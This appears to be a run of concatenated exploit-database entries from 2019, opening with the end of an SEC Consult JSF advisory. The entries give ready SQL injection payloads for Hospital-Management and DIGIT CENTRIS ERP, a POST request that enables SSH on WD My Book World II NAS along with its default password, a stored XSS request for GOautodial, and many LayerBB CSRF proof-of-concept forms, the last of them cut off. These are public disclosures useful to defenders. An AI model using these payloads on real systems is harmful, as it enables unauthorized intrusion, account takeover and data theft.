https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING

JSF is part of Java EE SDK, but Java EE is not a supported product, so
Oracle will not be announcing the fixes through their Critical Patch Update.

Eclipse has also been contacted, but no patch has been confirmed yet.


Workaround:
-----------
None.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Jean-Benjamin Rousseau - Guillaume Crouquet / @2019

# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-18
# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management
# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip
# Tested Version: 1.26
# Tested on OS: CentOS 7
# CVE: N/A

# Discription:
# Simple SQL injection after application authentication. 

# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 

fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: 

fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: 

fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE
# Google Dork: intitle:"My Book World Edition - MyBookWorld"
# Date: 19th Sep, 2019
# Exploit Author: Noman Riffat, National Security Services Group (NSSG)
# Vendor Homepage: https://wd.com/
# Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en
# Version: <= 1.02.12
# Tested on: Firmware
# CVE : CVE-2019-16399
POST /admin/system_advanced.php?lang=en HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Content-Length: 241
orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on
/*
The default password for SSH is 'welc0me' and the only security measure preventing SSH Login is the disabled SSH Port and it can be enabled with above POST Header. The attacker can then login to SSH Port with default password. WD My Book World II NAS is very outdated hardware and Western Digitial may never release update for it. It is still using PHP 4 so it has more potential of Remote Exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable.
There is no update coming probably and if you want to remain safe, abandon this NAS and switch to the latest hardware.
*/
Security Researcher - Noman Riffat, National Security Services Group (NSSG)
@nomanriffat, @nssgoman

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID 

# [POST REQUEST]

POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"

# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2019-09-19
# Vendor Homepage: https://goautodial.org/
# Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso
# Tested Version: 4.0
# Tested on OS: CentOS 7
# CVE: N/A

# Discription:
# Simple XSS attack after application authentication. 

# POST Request

POST /php/CreateEvent.php HTTP/1.1
Host: 10.0.0.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.25/events.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
Connection: close
DNT: 1

title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef

# Exploit Title: LayerBB 1.1.3 - Multiple CSRF
# Date: 4/7/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30
# Version: 1.1.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-16531


1. Description:
LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums.


2. Proof of Concepts:

<!-- Edit Usergroup CSRF -->
<form action="http://localhost/admin/edit_usergroup.php/id/1" method="POST" style="padding: 25px;">
<label for="g_name">Name</label>
<input type="text" name="g_name" id="g_name" value="User" class="form-control">
<label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
<textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
<label for="b_style_s">Banner Style Start</label>
<textarea name="b_style_s" id="b_style_s" class="form-control"><span class="label label -default"></textarea>
<label for="b_style_e">Banner Style End</label>
<textarea name="b_style_e" id="b_style_e" class="form-control"></span></textarea>
<label for="permissions">Permissions</label><br>
<input type="checkbox" name="permissions[]" value="1" checked=""> view_forum<br><input type="checkbox" name="permissions[]" value="2" checked=""> create_thread<br><input type="checkbox" name="permissions[]" value="3" checked=""> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
<br>
<input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
<br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Usergroup CSRF End -->

<!-- Edit User CSRF -->
<form action="http://localhost/admin/edit_user.php/id/1" method="POST" style="padding: 25px;">
<label for="username">Username</label>
<input type="text" name="username" id="username" value="Administrator" class="form-control">
<label for="email">Email Address</label>
<input type="text" name="email" id="email" value="demo@layerbb.com" class="form-control">
<label for="usermsg">User Message</label>
<input type="text" name="usermsg" id="usermsg" value="User" class="form-control">
<label for="signature">User Signature</label>
<textarea id="editor" name="signature" class="form-control" style="min-height:250px;"></textarea>
<label for="disabled">User Activated</label><br>
<input type="radio" name="disabled" value="0" checked=""> Do Not Change<br>
<input type="radio" name="disabled" value="0"> Active<br>
<input type="radio" name="disabled" value="1"> Disabled<br>
<br>
<label for="usergroup">Usergroup</label><br>
<select name="usergroup" id="usergroup" style="width:100%;">
<option value="4" selected="">Dont Change</option>
<option value="1">User</option><option value="2">Banned</option><option value="3">Moderator</option><option value="4">Administrator</option>
</select><br><br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit User CSRF End -->

<!-- Edit Category CSRF -->
<form action="http://localhost/admin/edit_category.php/id/1" method="POST" style="padding: 25px;">
<label for="cat_title">Title</label>
<input type="text" name="cat_title" id="cat_title" value="First Category" class="form-control">
<label for="cat_desc">Description</label>
<textarea name="cat_desc" id="cat_desc" class="form-control">First category on this forum!</textarea>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label><br>
<input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
<br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Category CSRF End -->

<!-- Edit Node CSRF -->
<form action="http://localhost/admin/edit_node.php/id/1" method="POST" style="padding: 25px;">
<label for="cat_title">Title</label>
<input type="text" name="node_title" id="cat_title" value="First Node" class="form-control">
<label for="cat_desc">Description</label>
<textarea name="node_desc" id="cat_desc" class="form-control">The first node on this forum</textarea>
<label for="parent">Parent</label><br>
<select name="node_parent" id="parent" style="width:100%;">
<option value="1" selected="">First Category</option>
</select>
<br>
<label for="additional_option">Additional Options</label><br>
<input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label><br>
<input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
<label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
<textarea name="labels" id="labels" class="form-control"></textarea><br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Node CSRF End -->

<!-- System Settings CSRF -->
<form action="http://localhost/admin/general.php" enctype="multipart/form-data" method="POST"><section class="col-lg-12">
<div class="box box-success">
<div class="box-header">
<div class="tab-content" style="padding: 25px;">
<br>
<label for="site_name">Board Name</label>
<input type="text" class="form-control" name="site_name" id="site_name" value="LayerBB Demo">
<label for="board_email">Board Email</label>
<input type="text" class="form-control" name="board_email" id="board_email" value="demo@layerbb.com">
<label for="number_subs">Number of shown subforums</label>
<input type="text" class="form-control" name="number_subs" id="number_subs" value="3">
<input type="checkbox" name="register_enable" value="1" id="reg_enable" checked=""> <label for="reg_enable">Enable Registeration</label><br>
<input type="checkbox" name="post_merge" value="1" id="post_merge" checked=""> <label for="post_merge">Merge Posts (<a href="#" title="Merge consecutive posts by the same user." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="site_enable" value="1" id="site_enable" checked=""> <label for="site_enable">Forum Enabled (<a href="#" title="Allows you to enable or disable your forums." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="email_verify" value="1" id="email_verify"> <label for="email_verify">Email Verification (<a href="#" title="Allows you to enable or disable email verification." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="enable_signatures" value="1" id="enable_signatures" checked=""> <label for="enable_signatures">Allow user signatures (<a href="#" title="Allows you to disable user signatures." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="enable_pcomments" value="1" id="enable_pcomments" checked=""> <label for="enable_pcomments">Enable Profile Comments (<a href="#" title="Allows you to disable profile comments." id="tooltip">?</a>)</label><br>
<br>
<label for="default_language">Default Languge</label><br>
<select name="default_language" id="Default_language" class="form-control">
<option value="english" selected="">English</option>
</select><br>
<input type="checkbox" name="enable_rtl" value="1" id="enable_rtl"> <label for="enable_rtl">Enable RTL (<a href="#" title="Enable Right-to-left for languages that need RTL" id="tooltip">?</a>)</label><br><br>
<label for="board_rules">Board Rules</label>
<span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes. Hyperlinks are not supported!</span>
<textarea name="board_rules" class="form-control" style="min-height:250px;">- No spamming.</textarea>
<br>
<label for="offline_msg">Offline Message</label>
<span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes.</span>
<textarea name="offline_msg" class="form-control" style="min-height:250px;"></textarea>
<br>
<label for="rcap_public">reCaptcha Public Key</label>
<input type="text" name="rcap_public" id="rcap_public" class="form-control" value="0">
<label for="rcap_private">reCaptcha Private Key</label>
<input type="text" name="rcap_private" id="rcap_private" class="form-control" value="0">
<input type="checkbox" name="enable_recaptcha" value="1"> Use reCaptcha<br>
<br>
<label for="content">Board Signature</label>
<textarea id="editor" name="board_signature" class="form-control" style="min-height:250px;"></textarea>
<div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
<br>
<label for="custom_logo">Easy Logo Changer</label>
<input type="file" name="custom_logo" id="custom_logo" class="form-control">

</div><br>
<center><input type="submit" name="update" class="btn btn-default" value="Save Settings"></center><br>
</div>
</div></section>
</form>
<!-- System Settings CSRF End -->

<!-- Manage Category CSRF -->
<table class="table table-hover">
<thead>
<tr>
<th style="width:70%">Category</th>
<th style="width:10%">Order</th>
<th style="width:20%">Controls</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<strong>test cat</strong><br>
<small>test cat</small>
</td>
<td>
<form action="http://localhost/admin/manage_category.php" method="POST">
<input type="hidden" name="cat_id" value="2">
<input type="text" class="form-control" name="cat_place" value="1">
<input type="submit" name="change_place" style="display:none;">
</form>
</td>
<td>
<div class="btn-group">
<li><a href="http://localhost/admin/edit_category.php/id/2">Edit Category</a></li>
<li><a href="http://localhost/admin/manage_category.php/delete_category/2">Delete Category</a></li>
</div>
</td>
</tr><tr>
<td>
<strong>First Category</strong><br>
<small>First category on this forum!</small>
</td>
<td>
<form action="http://localhost/admin/manage_category.php" method="POST">
<input type="hidden" name="cat_id" value="1">
<input type="text" class="form-control" name="cat_place" value="2">
<input type="submit" name="change_place" style="display:none;">
</form>
</td>
<td>
<div class="btn-group">
<li><a href="http://localhost/admin/edit_category.php/id/1">Edit Category</a></li>
<li><a href="http://localhost/admin/manage_category.php/delete_category/1">Delete Category</a></li>
</div>
</td>
</tr>
</tbody>
</table>
<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
<!-- Manage Category CSRF End -->

<!-- Manage Node CSRF -->
<table class="table table-hover">
<thead>
<tr>
<th style="width:70%">Node</th>
<th style="width:10%">Order</th>
<th style="width:20%">Controls</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<strong><a href="#" target="_blank">First Node</a></strong><br>
<small>The first node on this forum</small><br>
<small>Sub-Forums: </small>
</td>
<td>
<form action="http://localhost/admin/manage_node.php" method="POST">
<input type="hidden" name="node_id" value="1">
<input type="text" class="form-control" name="node_place" value="0">
<input type="submit" name="change_place" style="display:none;">
</form>
</td>
<td>
<div class="btn-group">
<li><a href="http://localhost/admin/edit_node.php/id/1">Edit Node</a></li>
<li><a href="http://localhost/admin/manage_node.php/delete_node/1">Delete Node</a></li>
<li><a href="http://localhost/admin/manage_node.php/toggle_lock/1">Toggle Lock</a></li>
</div>
</td>
</tr>
</tbody>
</table>
<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
<!-- Manage Node CSRF End -->

<!-- Mass Mail CSRF -->
<form action="http://localhost/admin/massemail.php" method="POST" style="padding: 25px;">
<label for="subject">Subject</label>
<input type="text" name="subject" id="subject" value="" class="form-control">
<label for="content">Email Content</label>
<textarea id="editor" name="content" class="form-control" style="min-height:250px;"></textarea><br>
<div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
<input type="submit" name="send" value="Send Email" class="btn btn-default">
</form>
<!-- Mass Mail CSRF End -->

<!-- Navbar CSRF -->
<form method="POST" action="http://localhost/admin/navbar.php">
<h4 class="modal-title" id="myModalLabel">Editing <b>google</b> Navbar Item</h4>
<input type="hidden" name="id" value="1">
<div class="form-group">
<label for="title">URL Title</label>
<input type="text" class="form-control" id="title" name="title" value="google">
</div>
<div class="form-group">
<label for="url">URL</label>
<input type="text" class="form-control" id="url" name="url" value="https://google.com">
</div>
<div class="form-group">
<label for="newpage">Open URL in new page</label>
<select class="form-control" id="newpage" name="newpage">
<option value="1">Current - Do Not Change</option>
<option value="1">Yes</option>
<option value="0">No</option>
</select>
</div>
<div class="form-group">
<label for="order">Order</label>
<input type="text" class="form-control" id="order" name="order" value="1">
</div>
<button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Navbar CSRF End -->

<!-- New Category CSRF -->
<form action="http://localhost/admin/new_category.php" method="POST" style="padding: 25px;">
<label for="cat_title">Title</label>
<input type="text" name="cat_title" id="cat_title" class="form-control">
<label for="cat_desc">Description</label>
<textarea name="cat_desc" id="cat_desc" class="form-control"></textarea>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label>
<br>
<input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
<br>
<input type="submit" name="create" value="Create Category" class="btn btn-default">
</form>
<!-- New Category CSRF End -->

<!-- New Node CSRF -->
<form action="http://localhost/admin/new_node.php" method="POST" style="padding: 25px;">
<label for="node_title">Title</label>
<input type="text" name="node_title" id="node_title" class="form-control">
<label for="node_desc">Description</label>
<textarea name="node_desc" id="node_desc" class="form-control"></textarea>
<label for="parent">Parent</label><br>
<select name="node_parent" id="parent">
<option value="1">First Category</option><option value="&1">&nbsp;&nbsp;&nbsp;&nbsp;-First Node</option>
</select>
<br>
<label for="additional_option">Additional Options</label><br>
<input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label>
<br>
<input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
<label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
<textarea name="labels" id="labels" class="form-control"></textarea><br>
<input type="submit" name="create" value="Create Node" class="btn btn-default">
</form>
<!-- New Node CSRF End -->

<!-- New Usergroup CSRF End -->
<form action="http://localhost/admin/new_usergroup.php" method="POST" style="padding: 25px;">
<label for="g_name">Name</label>
<input type="text" name="g_name" id="g_name" class="form-control">
<label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
<textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
<label for="permissions">Permissions</label><br>
<input type="checkbox" name="permissions[]" value="1"> view_forum<br><input type="checkbox" name="permissions[]" value="2"> create_thread<br><input type="checkbox" name="permissions[]" value="3"> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
<br>
<input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
<br>
<input type="submit" name="new" value="Create Usergroup" class="btn btn-default">
</form>
<!-- New Usergroup CSRF End -->

<!-- Profile Fields CSRF -->
<form method="POST" action="http://localhost/admin/profile_fields.php" style="padding: 25px;">
<input type="hidden" name="id" value="1">
<div class="form-group">
<label for="title">Title</label>
<input type="text" class="form-control" id="title" name="title" value="discord">
</div>
<button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Profile Fields CSRF End -->

<!-- Sidebar CSRF -->
<form method="POST" action="http://localhost/admin/sidebar.php" style="padding: 25px;">
<input type="hidden" name="id" value="1">
<div class="form-group">
<label for="title">Title</label>
<input type="text" class="form-control" id="title" name="title" value="Demo Information">
</div>
<div class="form-group">
<label for="content">Content</label>
<textarea class="form-control" name="content" id="content" style="min-height:250px;"><div class="alert alert-danger" role="alert"> This is the LayerBB Demo Website, you can login using<br /><br /> User: Administrator <br />Pass: admin (Case sensitive)<br /><br />This demo gets refreshed every 24-hours.</div></textarea>
</div>
<div class="form-group">
<label for="style">Style</label>
<select class="form-control" id="style" name="style">
<option value="danger">Current - Do Not Change</option>
<option value="primary">Primary</option>
<option value="success">Success</option>
<option value="info">Info</option>
<option value="warning">Warning</option>
<option value="danger">Danger</option></select>
</div>
<div class="form-group">
<label for="glyphicon">Glyphicon (Optional)</label>
<input type="text" class="form-control" id="glyphicon" name="glyphicon" value="alert">
</div>
<div class="form-group">
<label for="order">Order</label>
<input type="text" class="form-control" id="order" name="order" value="1">
</div>
<button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Sidebar CSRF End -->

<!-- Edit Threads/Posts CSRF -->
<form id="LAYER_form" action="http://localhost/edit.php/post/1" method="POST" style="padding: 25px;">
<input id="title" name="title" type="text" value="test"><br>
<textarea id="editor" name="content" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;">test post</textarea>
<br>
<input type="submit" name="edit" value="Edit Post">
</form>
<!-- Edit Threads/Posts CSRF -->

<!-- New Threads/Posts CSRF -->
<form id="LAYER_form" action="http://localhost/new.php/node/1" method="POST" style="padding: 25px;">
<input type="text" name="title" placeholder="Thread Title..." style="width:100%;" class="col-sm-9 form-control">
<div class="clearfix"></div>
<br>
<textarea id="editor" style="width: 100%; height: 300px; max-width: 100%;" name="content"></textarea>

<div class="center-block" style="margin-top:5px;">
<input type="submit" name="create" value="Create Thread">
</div>

<br>
<ul class="nav nav-tabs">
<li class="active"><a href="#polls" data-toggle="tab">Polls</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane active" id="polls">
<div class="col-md-6">
<label for="question">Question</label>
<input type="text" name="question">
<label for="answer_1">1. Answer</label>
<input type="text" name="answer_1" id="answer_1">
<label for="answer_2">2. Answer</label>
<input type="text" name="answer_2" id="answer_2">
<span class="btn btn-primary btn-xs" href="" onclick="plus();"> Add an answer field </span>
</div>
</div>
</div>
</form>
<!-- New Threads/Posts CSRF End -->

<!-- Thread Reply CSRF -->
<form id="LAYER_form" action="http://localhost/reply.php/test.1" method="POST" style="padding: 25px;">
<textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
<p class="pull-right" style="margin-top:5px;">
<input type="submit" name="reply" value="Post Reply">
</p>
</form>
<!-- Thread Reply CSRF End -->

<!-- PM Reply CSRF -->
<form id="%form_id%" action="http://localhost/conversations.php/cmd/reply/id/1" method="POST" style="padding: 25px;">
<textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea>
<p class="pull-right" style="margin-top:5px;">
<input type="submit" name="reply" value="Post Reply">
</p>
</form>
<!-- PM Reply CSRF End -->

<!-- Report Post CSRF -->
<form action="http://localhost/report.php/post/1" id="LAYER_form" method="POST" style="padding: 25px;">
<label for="reason">Reason</label>
<textarea name="reason" style="height:150px;width:100%;min-width:100%;max-width:100%;"></textarea>
<br>
<input type="submit" name="report" value="Report">
</form>
<!-- Report Post CSRF End -->

<!-- Edit Profile CSRF -->
<form id="LAYER_form" action="http://localhost/profile.php/cmd/edit" method="POST" style="padding: 25px;">
<label for="email">Email</label>
<input type="text" name="email" id="email" value="demo@layerbb.com">
<label for="usermsg">User Message</label>
<input type="text" name="usermsg" id="usermsg" value="User">
<label for="gender">Gender</label>
<select id="gender" name="gender"><option value="0" selected="selected">Not telling</option>
<option value="1">Female</option>
<option value="2">Male</option></select>
<label for="timezone">Timezone</label>
<select id="timezone" name="timezone"><option value="Pacific/Midway">(UTC-11:00) Midway Island</option><option value="Pacific/Samoa">(UTC-11:00) Samoa</option><option value="Pacific/Honolulu">(UTC-10:00) Hawaii</option><option value="US/Alaska">(UTC-09:00) Alaska</option><option value="America/Los_Angeles">(UTC-08:00) Pacific Time (US & Canada)</option><option value="America/Tijuana">(UTC-08:00) Tijuana</option><option value="US/Arizona">(UTC-07:00) Arizona</option><option value="America/Chihuahua">(UTC-07:00) Chihuahua</option><option value="America/Chihuahua">(UTC-07:00) La Paz</option><option value="America/Mazatlan">(UTC-07:00) Mazatlan</option><option value="US/Mountain">(UTC-07:00) Mountain Time (US & Canada)</option><option value="America/Managua">(UTC-06:00) Central America</option><option value="US/Central" selected="selected">(UTC-06:00) Central Time (US & Canada)</option><option value="America/Mexico_City">(UTC-06:00) Guadalajara</option><option value="America/Mexico_City">(UTC-06:00) Mexico City</option><option value="America/Monterrey">(UTC-06:00) Monterrey</option><option value="Canada/Saskatchewan">(UTC-06:00) Saskatchewan</option><option value="America/Bogota">(UTC-05:00) Bogota</option><option value="US/Eastern">(UTC-05:00) Eastern Time (US & Canada)</option><option value="US/East-Indiana">(UTC-05:00) Indiana (East)</option><option value="America/Lima">(UTC-05:00) Lima</option><option value="America/Bogota">(UTC-05:00) Quito</option><option value="Canada/Atlantic">(UTC-04:00) Atlantic Time (Canada)</option><option value="America/Caracas">(UTC-04:30) Caracas</option><option value="America/La_Paz">(UTC-04:00) La Paz</option><option value="America/Santiago">(UTC-04:00) Santiago</option><option value="Canada/Newfoundland">(UTC-03:30) Newfoundland</option><option value="America/Sao_Paulo">(UTC-03:00) Brasilia</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Buenos Aires</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Georgetown</option><option value="America/Godthab">(UTC-03:00) Greenland</option><option value="America/Noronha">(UTC-02:00) Mid-Atlantic</option><option value="Atlantic/Azores">(UTC-01:00) Azores</option><option value="Atlantic/Cape_Verde">(UTC-01:00) Cape Verde Is.</option><option value="Africa/Casablanca">(UTC+00:00) Casablanca</option><option value="Europe/London">(UTC+00:00) Edinburgh</option><option value="Etc/Greenwich">(UTC+00:00) Greenwich Mean Time : Dublin</option><option value="Europe/Lisbon">(UTC+00:00) Lisbon</option><option value="Europe/London">(UTC+00:00) London</option><option value="Africa/Monrovia">(UTC+00:00) Monrovia</option><option value="UTC">(UTC+00:00) UTC</option><option value="Europe/Amsterdam">(UTC+01:00) Amsterdam</option><option value="Europe/Belgrade">(UTC+01:00) Belgrade</option><option value="Europe/Berlin">(UTC+01:00) Berlin</option><option value="Europe/Berlin">(UTC+01:00) Bern</option><option value="Europe/Bratislava">(UTC+01:00) Bratislava</option><option value="Europe/Brussels">(UTC+01:00) Brussels</option><option value="Europe/Budapest">(UTC+01:00) Budapest</option><option value="Europe/Copenhagen">(UTC+01:00) Copenhagen</option><option value="Europe/Ljubljana">(UTC+01:00) Ljubljana</option><option value="Europe/Madrid">(UTC+01:00) Madrid</option><option value="Europe/Paris">(UTC+01:00) Paris</option><option value="Europe/Prague">(UTC+01:00) Prague</option><option value="Europe/Rome">(UTC+01:00) Rome</option><option value="Europe/Sarajevo">(UTC+01:00) Sarajevo</option><option value="Europe/Skopje">(UTC+01:00) Skopje</option><option value="Europe/Stockholm">(UTC+01:00) Stockholm</option><option value="Europe/Vienna">(UTC+01:00) Vienna</option><option value="Europe/Warsaw">(UTC+01:00) Warsaw</option><option value="Africa/Lagos">(UTC+01:00) West Central Africa</option><option value="Europe/Zagreb">(UTC+01:00) Zagreb</option><option value="Europe/Athens">(UTC+02:00) Athens</option><option value="Europe/Bucharest">(UTC+02:00) Bucharest</option><option value="Africa/Cairo">(UTC+02:00) Cairo</option><option value="Africa/H
<br>
<label for="location">Location</label>
<select id="location" name="location"><option value="--" selected="selected">Nothing selected</option><option value="AD">Andorra</option><option value="AE">United Arab Emirates</option><option value="AF">Afghanistan</option><option value="AG">Antigua and Barbuda</option><option value="AI">Anguilla</option><option value="AL">Albania</option><option value="AM">Armenia</option><option value="AO">Angola</option><option value="AQ">Antarctica</option><option value="AR">Argentina</option><option value="AS">American Samoa</option><option value="AT">Austria</option><option value="AU">Australia</option><option value="AW">Aruba</option><option value="AX">Aland Islands</option><option value="AZ">Azerbaijan</option><option value="BA">Bosnia and Herzegovina</option><option value="BB">Barbados</option><option value="BD">Bangladesh</option><option value="BE">Belgium</option><option value="BF">Burkina Faso</option><option value="BG">Bulgaria</option><option value="BH">Bahrain</option><option value="BI">Burundi</option><option value="BJ">Benin</option><option value="BL">Saint Barthélemy</option><option value="BM">Bermuda</option><option value="BN">Brunei Darussalam</option><option value="BO">Bolivia</option><option value="BQ">Bonaire</option><option value="BR">Brazil</option><option value="BS">Bahamas</option><option 